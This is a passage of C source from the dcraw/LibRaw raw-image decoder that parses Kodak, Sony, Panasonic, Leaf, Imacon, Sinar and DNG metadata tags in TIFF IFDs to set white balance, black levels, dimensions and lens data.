if (!strcmp(data,"CaptProf_color_matrix")) {
for (i=0; i < 9; i++)
fscanf (ifp, "%f", (float *)romm_cam + i);
romm_coeff (romm_cam);
}
if (!strcmp(data,"CaptProf_number_of_planes"))
fscanf (ifp, "%d", &planes);
if (!strcmp(data,"CaptProf_raw_data_rotation"))
fscanf (ifp, "%d", &flip);
if (!strcmp(data,"CaptProf_mosaic_pattern"))
FORC4 {
fscanf (ifp, "%d", &i);
if (i == 1) frot = c ^ (c >> 1);
}
if (!strcmp(data,"ImgProf_rotation_angle")) {
fscanf (ifp, "%d", &i);
flip = i - flip;
}
if (!strcmp(data,"NeutObj_neutrals") && !cam_mul[0]) {
FORC4 fscanf (ifp, "%d", neut+c);
FORC3 cam_mul[c] = (float) neut[0] / neut[c+1];
}
if (!strcmp(data,"Rows_data"))
load_flags = get4();
parse_mos (from);
fseek (ifp, skip+from, SEEK_SET);
}
if (planes)
filters = (planes == 1) * 0x01010101 *
(uchar) "\x94\x61\x16\x49"[(flip/90 + frot) & 3];
}
void CLASS linear_table (unsigned len)
{
int i;
if (len > 0x10000) len = 0x10000;
read_shorts (curve, len);
for (i=len; i < 0x10000; i++)
curve[i] = curve[i-1];
maximum = curve[len<0x1000?0xfff:len-1];
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS Kodak_WB_0x08tags (int wb, unsigned type)
{
float mul[3]={1,1,1}, num, mul2;
int c;
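// Convert the three as-shot gains into the R,G,B,G2 coefficient layout:
// green is stored as-is; red and blue become G*G/R and G*G/B, i.e. the usual
// green-normalised multipliers scaled by a common factor of the green gain.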
FORC3 mul[c] = (num=getreal(type))==0 ? 1 : num;
imgdata.color.WB_Coeffs[wb][1] = imgdata.color.WB_Coeffs[wb][3] = mul[1];
mul2 = mul[1] * mul[1];
imgdata.color.WB_Coeffs[wb][0] = mul2 / mul[0];
imgdata.color.WB_Coeffs[wb][2] = mul2 / mul[2];
return;
}
/* Thanks to Alexey Danilchenko for wb as-shot parsing code */
void CLASS parse_kodak_ifd (int base)
{
unsigned entries, tag, type, len, save;
int i, c, wbi=-2;
float mul[3]={1,1,1}, num;
static const int wbtag[] = { 64037,64040,64039,64041,-1,-1,64042 };
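// wbtag[] maps the illuminant index read from tag 64013 to the tag that
// carries that illuminant's camera multipliers (see the wbi handling below).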
entries = get2();
if (entries > 1024) return;
INT64 fsize = ifp->size();
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
INT64 savepos = ftell(ifp);
if(len > 8 && len + savepos > 2*fsize) continue;
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag | 0x20000,type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
if (tag == 1011) imgdata.other.FlashEC = getreal(type);
if (tag == 1020) wbi = getint(type);
if (tag == 1021 && len == 72) { /* WB set in software */
fseek (ifp, 40, SEEK_CUR);
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0f,get2());
wbi = -2;
}
if (tag == 0x0848) Kodak_WB_0x08tags(LIBRAW_WBI_Daylight, type);
if (tag == 0x0849) Kodak_WB_0x08tags(LIBRAW_WBI_Tungsten, type);
if (tag == 0x084a) Kodak_WB_0x08tags(LIBRAW_WBI_Fluorescent, type);
if (tag == 0x084b) Kodak_WB_0x08tags(LIBRAW_WBI_Flash, type);
if (tag == 0x0e93) imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = get2();
if (tag == 0x09ce)
stmread(imgdata.shootinginfo.InternalBodySerial,len, ifp);
if (tag == 0xfa00)
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if (tag == 0xfa27)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1];
}
if (tag == 0xfa28)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][1];
}
if (tag == 0xfa29)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1];
}
if (tag == 0xfa2a)
{
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c] = get4();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1];
}
if (tag == 2120 + wbi ||
(wbi<0 && tag == 2125)) /* use Auto WB if illuminant index is not set */
{
FORC3 mul[c] = (num=getreal(type))==0 ? 1 : num;
FORC3 cam_mul[c] = mul[1] / mul[c]; /* normalise against green */
}
if (tag == 2317) linear_table (len);
if (tag == 0x903) iso_speed = getreal(type);
//if (tag == 6020) iso_speed = getint(type);
if (tag == 64013) wbi = fgetc(ifp);
if ((unsigned) wbi < 7 && tag == wbtag[wbi])
FORC3 cam_mul[c] = get4();
if (tag == 64019) width = getint(type);
if (tag == 64020) height = (getint(type)+1) & -2;
fseek (ifp, save, SEEK_SET);
}
}
#else
void CLASS parse_kodak_ifd (int base)
{
unsigned entries, tag, type, len, save;
int i, c, wbi=-2, wbtemp=6500;
float mul[3]={1,1,1}, num;
static const int wbtag[] = { 64037,64040,64039,64041,-1,-1,64042 };
entries = get2();
if (entries > 1024) return;
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
if (tag == 1020) wbi = getint(type);
if (tag == 1021 && len == 72) { /* WB set in software */
fseek (ifp, 40, SEEK_CUR);
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0,get2());
wbi = -2;
}
if (tag == 2118) wbtemp = getint(type);
if (tag == 2120 + wbi && wbi >= 0)
FORC3 cam_mul[c] = 2048.0 / fMAX(1.0,getreal(type));
if (tag == 2130 + wbi)
FORC3 mul[c] = getreal(type);
if (tag == 2140 + wbi && wbi >= 0)
FORC3 {
for (num=i=0; i < 4; i++)
num += getreal(type) * pow (wbtemp/100.0, i);
cam_mul[c] = 2048 / fMAX(1.0,(num * mul[c]));
}
if (tag == 2317) linear_table (len);
if (tag == 6020) iso_speed = getint(type);
if (tag == 64013) wbi = fgetc(ifp);
if ((unsigned) wbi < 7 && tag == wbtag[wbi])
FORC3 cam_mul[c] = get4();
if (tag == 64019) width = getint(type);
if (tag == 64020) height = (getint(type)+1) & -2;
fseek (ifp, save, SEEK_SET);
}
}
#endif
//@end COMMON
void CLASS parse_minolta (int base);
int CLASS parse_tiff (int base);
//@out COMMON
int CLASS parse_tiff_ifd (int base)
{
unsigned entries, tag, type, len, plen=16, save;
int ifd, use_cm=0, cfa, i, j, c, ima_len=0;
char *cbuf, *cp;
uchar cfa_pat[16], cfa_pc[] = { 0,1,2,3 }, tab[256];
double fm[3][4], cc[4][4], cm[4][3], cam_xyz[4][3], num;
double ab[]={ 1,1,1,1 }, asn[] = { 0,0,0,0 }, xyz[] = { 1,1,1 };
unsigned sony_curve[] = { 0,0,0,0,0,4095 };
unsigned *buf, sony_offset=0, sony_length=0, sony_key=0;
struct jhead jh;
int pana_raw = 0;
#ifndef LIBRAW_LIBRARY_BUILD
FILE *sfp;
#endif
if (tiff_nifds >= sizeof tiff_ifd / sizeof tiff_ifd[0])
return 1;
ifd = tiff_nifds++;
for (j=0; j < 4; j++)
for (i=0; i < 4; i++)
cc[j][i] = i == j;
entries = get2();
if (entries > 512) return 1;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 fsize = ifp->size();
#endif
while (entries--) {
tiff_get (base, &tag, &type, &len, &save);
#ifdef LIBRAW_LIBRARY_BUILD
INT64 savepos = ftell(ifp);
if(len > 8 && len + savepos > fsize*2) continue; // skip tags whose data would extend beyond twice the file size
if(callbacks.exif_cb)
{
callbacks.exif_cb(callbacks.exifparser_data,tag|(pana_raw?0x30000:0),type,len,order,ifp);
fseek(ifp,savepos,SEEK_SET);
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncasecmp(make, "SONY", 4) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "HV",2))))
{
switch (tag) {
case 0x7300: // SR2 black level
for (int i = 0; i < 4 && i < len; i++)
cblack[i] = get2();
break;
case 0x7480:
case 0x7820:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][1];
break;
case 0x7481:
case 0x7821:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][1];
break;
case 0x7482:
case 0x7822:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][1];
break;
case 0x7483:
case 0x7823:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][1];
break;
case 0x7484:
case 0x7824:
imgdata.color.WBCT_Coeffs[0][0] = 4500;
FORC3 imgdata.color.WBCT_Coeffs[0][c+1] = get2();
imgdata.color.WBCT_Coeffs[0][4] = imgdata.color.WBCT_Coeffs[0][2];
break;
case 0x7486:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Fluorescent][1];
break;
case 0x7825:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][1];
break;
case 0x7826:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1];
break;
case 0x7827:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][1];
break;
case 0x7828:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][1];
break;
case 0x7829:
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][3] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][1];
break;
case 0x782a:
imgdata.color.WBCT_Coeffs[1][0] = 8500;
FORC3 imgdata.color.WBCT_Coeffs[1][c+1] = get2();
imgdata.color.WBCT_Coeffs[1][4] = imgdata.color.WBCT_Coeffs[1][2];
break;
case 0x782b:
imgdata.color.WBCT_Coeffs[2][0] = 6000;
FORC3 imgdata.color.WBCT_Coeffs[2][c+1] = get2();
imgdata.color.WBCT_Coeffs[2][4] = imgdata.color.WBCT_Coeffs[2][2];
break;
case 0x782c:
imgdata.color.WBCT_Coeffs[3][0] = 3200;
FORC3 imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][c] = imgdata.color.WBCT_Coeffs[3][c+1] = get2();
imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][3] = imgdata.color.WBCT_Coeffs[3][4] = imgdata.color.WB_Coeffs[LIBRAW_WBI_StudioTungsten][1];
break;
case 0x782d:
imgdata.color.WBCT_Coeffs[4][0] = 2500;
FORC3 imgdata.color.WBCT_Coeffs[4][c+1] = get2();
imgdata.color.WBCT_Coeffs[4][4] = imgdata.color.WBCT_Coeffs[4][2];
break;
case 0x787f:
FORC3 imgdata.color.linear_max[c] = get2();
imgdata.color.linear_max[3] = imgdata.color.linear_max[1];
break;
}
}
#endif
switch (tag) {
case 1: if(len==4) pana_raw = get4(); break;
case 5: width = get2(); break;
case 6: height = get2(); break;
case 7: width += get2(); break;
case 9: if ((i = get2())) filters = i;
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
pana_black[3]+=i;
#endif
break;
case 8:
case 10:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
pana_black[3]+=get2();
#endif
break;
case 14: case 15: case 16:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw) {
imgdata.color.linear_max[tag-14] = get2();
if (tag == 15 ) imgdata.color.linear_max[3] = imgdata.color.linear_max[1];
}
#endif
break;
case 17: case 18:
if (type == 3 && len == 1)
cam_mul[(tag-17)*2] = get2() / 256.0;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 19:
if(pana_raw) {
ushort nWB, cnt, tWB;
nWB = get2();
if (nWB > 0x100) break;
for (cnt=0; cnt<nWB; cnt++) {
tWB = get2();
if (tWB < 0x100) {
imgdata.color.WB_Coeffs[tWB][0] = get2();
imgdata.color.WB_Coeffs[tWB][2] = get2();
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] = 0x100;
} else get4();
}
}
break;
#endif
case 23:
if (type == 3) iso_speed = get2();
break;
case 28: case 29: case 30:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw && len == 1 && type ==3)
{
pana_black[tag-28] = get2();
}
else
#endif
{
cblack[tag-28] = get2();
cblack[3] = cblack[1];
}
break;
case 36: case 37: case 38:
cam_mul[tag-36] = get2();
break;
case 39:
#ifdef LIBRAW_LIBRARY_BUILD
if(pana_raw) {
ushort nWB, cnt, tWB;
nWB = get2();
if (nWB > 0x100) break;
for (cnt=0; cnt<nWB; cnt++) {
tWB = get2();
if (tWB < 0x100) {
imgdata.color.WB_Coeffs[tWB][0] = get2();
imgdata.color.WB_Coeffs[tWB][1] = imgdata.color.WB_Coeffs[tWB][3] = get2();
imgdata.color.WB_Coeffs[tWB][2] = get2();
} else fseek(ifp, 6, SEEK_CUR);
}
}
break;
#endif
if (len < 50 || cam_mul[0]) break;
fseek (ifp, 12, SEEK_CUR);
FORC3 cam_mul[c] = get2();
break;
case 46:
if (type != 7 || fgetc(ifp) != 0xff || fgetc(ifp) != 0xd8) break;
thumb_offset = ftell(ifp) - 2;
thumb_length = len;
break;
case 61440: /* Fuji HS10 table */
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
break;
case 2: case 256: case 61441: /* ImageWidth */
tiff_ifd[ifd].t_width = getint(type);
break;
case 3: case 257: case 61442: /* ImageHeight */
tiff_ifd[ifd].t_height = getint(type);
break;
case 258: /* BitsPerSample */
case 61443:
tiff_ifd[ifd].samples = len & 7;
tiff_ifd[ifd].bps = getint(type);
if (tiff_bps < tiff_ifd[ifd].bps)
tiff_bps = tiff_ifd[ifd].bps;
break;
case 61446:
raw_height = 0;
if (tiff_ifd[ifd].bps > 12) break;
load_raw = &CLASS packed_load_raw;
load_flags = get4() ? 24:80;
break;
case 259: /* Compression */
tiff_ifd[ifd].comp = getint(type);
break;
case 262: /* PhotometricInterpretation */
tiff_ifd[ifd].phint = get2();
break;
case 270: /* ImageDescription */
fread (desc, 512, 1, ifp);
break;
case 271: /* Make */
fgets (make, 64, ifp);
break;
case 272: /* Model */
fgets (model, 64, ifp);
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 278:
tiff_ifd[ifd].rows_per_strip = getint(type);
break;
#endif
case 280: /* Panasonic RW2 offset */
if (type != 4) break;
load_raw = &CLASS panasonic_load_raw;
load_flags = 0x2008;
case 273: /* StripOffset */
#ifdef LIBRAW_LIBRARY_BUILD
if(len > 1 && len < 16384)
{
off_t sav = ftell(ifp);
tiff_ifd[ifd].strip_offsets = (int*)calloc(len,sizeof(int));
tiff_ifd[ifd].strip_offsets_count = len;
for(int i=0; i< len; i++)
tiff_ifd[ifd].strip_offsets[i]=get4()+base;
fseek(ifp,sav,SEEK_SET); // restore position
}
/* intentional fall-through to the generic offset handling below */
#endif
case 513: /* JpegIFOffset */
case 61447:
tiff_ifd[ifd].offset = get4()+base;
if (!tiff_ifd[ifd].bps && tiff_ifd[ifd].offset > 0) {
fseek (ifp, tiff_ifd[ifd].offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
tiff_ifd[ifd].comp = 6;
tiff_ifd[ifd].t_width = jh.wide;
tiff_ifd[ifd].t_height = jh.high;
tiff_ifd[ifd].bps = jh.bits;
tiff_ifd[ifd].samples = jh.clrs;
if (!(jh.sraw || (jh.clrs & 1)))
tiff_ifd[ifd].t_width *= jh.clrs;
if ((tiff_ifd[ifd].t_width > 4*tiff_ifd[ifd].t_height) & ~jh.clrs) {
tiff_ifd[ifd].t_width /= 2;
tiff_ifd[ifd].t_height *= 2;
}
i = order;
parse_tiff (tiff_ifd[ifd].offset + 12);
order = i;
}
}
break;
case 274: /* Orientation */
tiff_ifd[ifd].t_flip = "50132467"[get2() & 7]-'0';
break;
case 277: /* SamplesPerPixel */
tiff_ifd[ifd].samples = getint(type) & 7;
break;
case 279: /* StripByteCounts */
#ifdef LIBRAW_LIBRARY_BUILD
if(len > 1 && len < 16384)
{
off_t sav = ftell(ifp);
tiff_ifd[ifd].strip_byte_counts = (int*)calloc(len,sizeof(int));
tiff_ifd[ifd].strip_byte_counts_count = len;
for(int i=0; i< len; i++)
tiff_ifd[ifd].strip_byte_counts[i]=get4();
fseek(ifp,sav,SEEK_SET); // restore position
}
/* intentional fall-through to the generic byte-count handling below */
#endif
case 514:
case 61448:
tiff_ifd[ifd].bytes = get4();
break;
case 61454:
FORC3 cam_mul[(4-c) % 3] = getint(type);
break;
case 305: case 11: /* Software */
fgets (software, 64, ifp);
if (!strncmp(software,"Adobe",5) ||
!strncmp(software,"dcraw",5) ||
!strncmp(software,"UFRaw",5) ||
!strncmp(software,"Bibble",6) ||
!strcmp (software,"Digital Photo Professional"))
is_raw = 0;
break;
case 306: /* DateTime */
get_timestamp(0);
break;
case 315: /* Artist */
fread (artist, 64, 1, ifp);
break;
case 317:
tiff_ifd[ifd].predictor = getint(type);
break;
case 322: /* TileWidth */
tiff_ifd[ifd].t_tile_width = getint(type);
break;
case 323: /* TileLength */
tiff_ifd[ifd].t_tile_length = getint(type);
break;
case 324: /* TileOffsets */
tiff_ifd[ifd].offset = len > 1 ? ftell(ifp) : get4();
if (len == 1)
tiff_ifd[ifd].t_tile_width = tiff_ifd[ifd].t_tile_length = 0;
if (len == 4) {
load_raw = &CLASS sinar_4shot_load_raw;
is_raw = 5;
}
break;
case 325:
tiff_ifd[ifd].bytes = len > 1 ? ftell(ifp): get4();
break;
case 330: /* SubIFDs */
if (!strcmp(model,"DSLR-A100") && tiff_ifd[ifd].t_width == 3872) {
load_raw = &CLASS sony_arw_load_raw;
data_offset = get4()+base;
ifd++;
#ifdef LIBRAW_LIBRARY_BUILD
if (ifd >= sizeof tiff_ifd / sizeof tiff_ifd[0])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
break;
}
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(make,"Hasselblad",10) && libraw_internal_data.unpacker_data.hasselblad_parser_flag) {
fseek (ifp, ftell(ifp)+4, SEEK_SET);
fseek (ifp, get4()+base, SEEK_SET);
parse_tiff_ifd (base);
break;
}
#endif
if(len > 1000) len=1000; /* 1000 SubIFDs is enough */
while (len--) {
i = ftell(ifp);
fseek (ifp, get4()+base, SEEK_SET);
if (parse_tiff_ifd (base)) break;
fseek (ifp, i+4, SEEK_SET);
}
break;
case 339:
tiff_ifd[ifd].sample_format = getint(type);
break;
case 400:
strcpy (make, "Sarnoff");
maximum = 0xfff;
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 700:
if((type == 1 || type == 2 || type == 6 || type == 7) && len > 1 && len < 5100000)
{
xmpdata = (char*)malloc(xmplen = len+1);
fread(xmpdata,len,1,ifp);
xmpdata[len]=0;
}
break;
#endif
case 28688:
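// Sony tone curve: the four knee points read here split the curve into
// segments whose per-step increment doubles after each knee (1 << i).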
FORC4 sony_curve[c+1] = get2() >> 2 & 0xfff;
for (i=0; i < 5; i++)
for (j = sony_curve[i]+1; j <= sony_curve[i+1]; j++)
curve[j] = curve[j-1] + (1 << i);
break;
case 29184: sony_offset = get4(); break;
case 29185: sony_length = get4(); break;
case 29217: sony_key = get4(); break;
case 29264:
parse_minolta (ftell(ifp));
raw_width = 0;
break;
case 29443:
FORC4 cam_mul[c ^ (c < 2)] = get2();
break;
case 29459:
FORC4 cam_mul[c] = get2();
i = (cam_mul[1] == 1024 && cam_mul[2] == 1024) << 1;
SWAP (cam_mul[i],cam_mul[i+1])
break;
#ifdef LIBRAW_LIBRARY_BUILD
case 30720: // Sony matrix, Sony_SR2SubIFD_0x7800
for (i=0; i < 3; i++) {
float num = 0.0;
for (c=0; c<3; c++) {
imgdata.color.ccm[i][c] = (float) ((short)get2());
num += imgdata.color.ccm[i][c];
}
if (num > 0.01) FORC3 imgdata.color.ccm[i][c] = imgdata.color.ccm[i][c] / num;
}
break;
#endif
case 29456: // Sony black level, Sony_SR2SubIFD_0x7310, no longer needs to be divided by 4
FORC4 cblack[c ^ c >> 1] = get2();
i = cblack[3];
FORC3 if(i>cblack[c]) i = cblack[c];
FORC4 cblack[c]-=i;
black = i;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr, _("...Sony black: %u cblack: %u %u %u %u\n"),black, cblack[0],cblack[1],cblack[2], cblack[3]);
#endif
break;
case 33405: /* Model2 */
fgets (model2, 64, ifp);
break;
case 33421: /* CFARepeatPatternDim */
if (get2() == 6 && get2() == 6)
filters = 9;
break;
case 33422: /* CFAPattern */
if (filters == 9) {
FORC(36) ((char *)xtrans)[c] = fgetc(ifp) & 3;
break;
}
case 64777: /* Kodak P-series */
if(len == 36)
{
filters = 9;
colors = 3;
FORC(36) xtrans[0][c] = fgetc(ifp) & 3;
}
else if(len > 0)
{
if ((plen=len) > 16) plen = 16;
fread (cfa_pat, 1, plen, ifp);
for (colors=cfa=i=0; i < plen && colors < 4; i++) {
colors += !(cfa & (1 << cfa_pat[i]));
cfa |= 1 << cfa_pat[i];
}
if (cfa == 070) memcpy (cfa_pc,"\003\004\005",3); /* CMY */
if (cfa == 072) memcpy (cfa_pc,"\005\003\004\001",4); /* GMCY */
goto guess_cfa_pc;
}
break;
case 33424:
case 65024:
fseek (ifp, get4()+base, SEEK_SET);
parse_kodak_ifd (base);
break;
case 33434: /* ExposureTime */
tiff_ifd[ifd].t_shutter = shutter = getreal(type);
break;
case 33437: /* FNumber */
aperture = getreal(type);
break;
#ifdef LIBRAW_LIBRARY_BUILD
// IB start
case 0xa405: // FocalLengthIn35mmFormat
imgdata.lens.FocalLengthIn35mmFormat = get2();
break;
case 0xa431: // BodySerialNumber
case 0xc62f:
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0xa432: // LensInfo, 42034dec, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa435: // LensSerialNumber
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0xc630: // DNG LensInfo, Lens Specification per EXIF standard
imgdata.lens.MinFocal = getreal(type);
imgdata.lens.MaxFocal = getreal(type);
imgdata.lens.MaxAp4MinFocal = getreal(type);
imgdata.lens.MaxAp4MaxFocal = getreal(type);
break;
case 0xa433: // LensMake
stmread(imgdata.lens.LensMake, len, ifp);
break;
case 0xa434: // LensModel
stmread(imgdata.lens.Lens, len, ifp);
if (!strncmp(imgdata.lens.Lens, "----", 4))
imgdata.lens.Lens[0] = 0;
break;
case 0x9205:
imgdata.lens.EXIF_MaxAp = libraw_powf64(2.0f, (getreal(type) / 2.0f));
break;
// IB end
#endif
case 34306: /* Leaf white balance */
FORC4 cam_mul[c ^ 1] = 4096.0 / get2();
break;
case 34307: /* Leaf CatchLight color matrix */
fread (software, 1, 7, ifp);
if (strncmp(software,"MATRIX",6)) break;
colors = 4;
for (raw_color = i=0; i < 3; i++) {
FORC4 fscanf (ifp, "%f", &rgb_cam[i][c^1]);
if (!use_camera_wb) continue;
num = 0;
FORC4 num += rgb_cam[i][c];
FORC4 rgb_cam[i][c] /= MAX(1,num);
}
break;
case 34310: /* Leaf metadata */
parse_mos (ftell(ifp));
case 34303:
strcpy (make, "Leaf");
break;
case 34665: /* EXIF tag */
fseek (ifp, get4()+base, SEEK_SET);
parse_exif (base);
break;
case 34853: /* GPSInfo tag */
{
unsigned pos;
fseek(ifp, pos = (get4() + base), SEEK_SET);
parse_gps(base);
#ifdef LIBRAW_LIBRARY_BUILD
fseek(ifp, pos, SEEK_SET);
parse_gps_libraw(base);
#endif
}
break;
case 34675: /* InterColorProfile */
case 50831: /* AsShotICCProfile */
profile_offset = ftell(ifp);
profile_length = len;
break;
case 37122: /* CompressedBitsPerPixel */
kodak_cbpp = get4();
break;
case 37386: /* FocalLength */
focal_len = getreal(type);
break;
case 37393: /* ImageNumber */
shot_order = getint(type);
break;
case 37400: /* old Kodak KDC tag */
for (raw_color = i=0; i < 3; i++) {
getreal(type);
FORC3 rgb_cam[i][c] = getreal(type);
}
break;
case 40976:
strip_offset = get4();
switch (tiff_ifd[ifd].comp) {
case 32770: load_raw = &CLASS samsung_load_raw; break;
case 32772: load_raw = &CLASS samsung2_load_raw; break;
case 32773: load_raw = &CLASS samsung3_load_raw; break;
}
break;
case 46275: /* Imacon tags */
strcpy (make, "Imacon");
data_offset = ftell(ifp);
ima_len = len;
break;
case 46279:
if (!ima_len) break;
fseek (ifp, 38, SEEK_CUR);
case 46274:
fseek (ifp, 40, SEEK_CUR);
raw_width = get4();
raw_height = get4();
left_margin = get4() & 7;
width = raw_width - left_margin - (get4() & 7);
top_margin = get4() & 7;
height = raw_height - top_margin - (get4() & 7);
if (raw_width == 7262 && ima_len == 234317952 ) {
height = 5412;
width = 7216;
left_margin = 7;
filters=0;
} else if (raw_width == 7262) {
height = 5444;
width = 7244;
left_margin = 7;
}
fseek (ifp, 52, SEEK_CUR);
FORC3 cam_mul[c] = getreal(11);
fseek (ifp, 114, SEEK_CUR);
flip = (get2() >> 7) * 90;
if (width * height * 6 == ima_len) {
if (flip % 180 == 90) SWAP(width,height);
raw_width = width;
raw_height = height;
left_margin = top_margin = filters = flip = 0;
}
sprintf (model, "Ixpress %d-Mp", height*width/1000000);
load_raw = &CLASS imacon_full_load_raw;
if (filters) {
if (left_margin & 1) filters = 0x61616161;
load_raw = &CLASS unpacked_load_raw;
}
maximum = 0xffff;
break;
case 50454: /* Sinar tag */
case 50455:
if (len < 1 || len > 2560000 || !(cbuf = (char *) malloc(len))) break;
#ifndef LIBRAW_LIBRARY_BUILD
fread (cbuf, 1, len, ifp);
#else
if(fread (cbuf, 1, len, ifp) != len)
throw LIBRAW_EXCEPTION_IO_CORRUPT; // cbuf will be freed in recycle()
#endif
cbuf[len-1] = 0;
for (cp = cbuf-1; cp && cp < cbuf+len; cp = strchr(cp,'\n'))
if (!strncmp (++cp,"Neutral ",8))
sscanf (cp+8, "%f %f %f", cam_mul, cam_mul+1, cam_mul+2);
free (cbuf);
break;
case 50458:
if (!make[0]) strcpy (make, "Hasselblad");
break;
case 50459: /* Hasselblad tag */
#ifdef LIBRAW_LIBRARY_BUILD
libraw_internal_data.unpacker_data.hasselblad_parser_flag=1;
#endif
i = order;
j = ftell(ifp);
c = tiff_nifds;
order = get2();
fseek (ifp, j+(get2(),get4()), SEEK_SET);
parse_tiff_ifd (j);
maximum = 0xffff;
tiff_nifds = c;
order = i;
break;
case 50706: /* DNGVersion */
FORC4 dng_version = (dng_version << 8) + fgetc(ifp);
if (!make[0]) strcpy (make, "DNG");
is_raw = 1;
break;
case 50708: /* UniqueCameraModel */
#ifdef LIBRAW_LIBRARY_BUILD
stmread(imgdata.color.UniqueCameraModel, len, ifp);
imgdata.color.UniqueCameraModel[sizeof(imgdata.color.UniqueCameraModel)-1] = 0;
#endif
if (model[0]) break;
#ifndef LIBRAW_LIBRARY_BUILD
fgets (make, 64, ifp);
#else
strncpy (make, imgdata.color.UniqueCameraModel, MIN(len, sizeof(imgdata.color.UniqueCameraModel)));
#endif
if ((cp = strchr(make,' '))) {
strcpy(model,cp+1);
*cp = 0;
}
break;
case 50710: /* CFAPlaneColor */
if (filters == 9) break;
if (len > 4) len = 4;
colors = len;
fread (cfa_pc, 1, colors, ifp);
guess_cfa_pc:
FORCC tab[cfa_pc[c]] = c;
cdesc[c] = 0;
for (i=16; i--; )
filters = filters << 2 | tab[cfa_pat[i % plen]];
filters -= !filters;
break;
case 50711: /* CFALayout */
if (get2() == 2) fuji_width = 1;
break;
case 291:
case 50712: /* LinearizationTable */
linear_table (len);
break;
case 50713: /* BlackLevelRepeatDim */
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.dng_levels.dng_cblack[4] =
#endif
cblack[4] = get2();
#ifdef LIBRAW_LIBRARY_BUILD
